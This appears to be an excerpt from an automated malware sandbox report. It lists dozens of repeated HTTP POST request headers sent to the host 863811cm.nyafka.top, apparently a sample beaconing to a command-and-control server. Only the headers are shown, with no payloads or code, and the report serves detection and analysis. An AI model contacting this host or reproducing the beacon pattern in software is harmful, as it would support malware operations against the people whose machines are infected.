                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1916Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----D8uRY6zZHiCD11yIzdIT3kMfNkb2krW7GnUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2766Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1892Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1972Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1972Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1992Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----iXBE9x7sAZ9s8LIMWmsWdYRkexiMsvuP81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1972Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2580Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1992Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ddn8qPGODcLu2yd5tsptkWBxsiMqNsep61User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1992Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1992Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----NHB4gCvyF09nvGpdQX0ryrYNSBUL2ro1PGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3182Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
